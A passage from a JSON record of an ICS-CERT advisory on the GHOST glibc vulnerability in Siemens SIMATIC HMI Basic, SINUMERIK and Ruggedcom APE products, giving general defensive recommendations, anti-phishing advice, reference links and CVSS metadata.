Please see the Siemens advisory for the update details.\n\n### **\\--------- End Update A Part 2 of 2 --------**\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\nMinimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: <http://ics-cert.us-cert.gov/content/recommended-practices>. Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.](<http://ics-cert.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>) ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<http://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B>), that is available for download from the ICS-CERT web site (<http://ics-cert.us-cert.gov/>).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\nIn addition, ICS-CERT recommends that users take the following measures 
to protect themselves from social engineering attacks:\n\n 1. Do not click web links or open unsolicited attachments in email messages.\n 2. Refer to Recognizing and Avoiding Email Scamse for more information on avoiding email scams.\n 3. Refer to Avoiding Social Engineering and Phishing Attacksf for more information on social engineering attacks.\n * a. Further information about the GHOST vulnerability: <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0235>, web site last accessed March 05, 2015.\n * b. CWE-20: Improper Input Validation, <http://cwe.mitre.org/data/definitions/20.html>, web site last accessed March 05, 2015.\n * c. NVD, <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0235>, web site last accessed March 05, 2015.\n * d. CVSS Calculator, [http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:L/AC:L/Au:S/C:N/I:N/A:C](<http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:L/AC:L/Au:S/C:N/I:N/A:C>), web site last accessed March 05, 2015.\n * e. Recognizing and Avoiding Email Scams, <http://www.us-cert.gov/reading_room/emailscams_0905.pdf>, web site last accessed March 05, 2015.\n * f. National Cyber Alert System Cyber Security Tip ST04-014, <http://www.us-cert.gov/cas/tips/ST04-014.html>, web site last accessed March 05, 2015.\n", "modified": "2018-08-27T00:00:00", "published": "2015-04-23T00:00:00", "id": "ICSA-15-064-01A", "href": "https://ics-cert.us-cert.gov//advisories/ICSA-15-064-01A", "title": "Siemens SIMATIC HMI Basic, SINUMERIK, and Ruggedcom APE GHOST Vulnerability (Update A)", "type": "ics", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}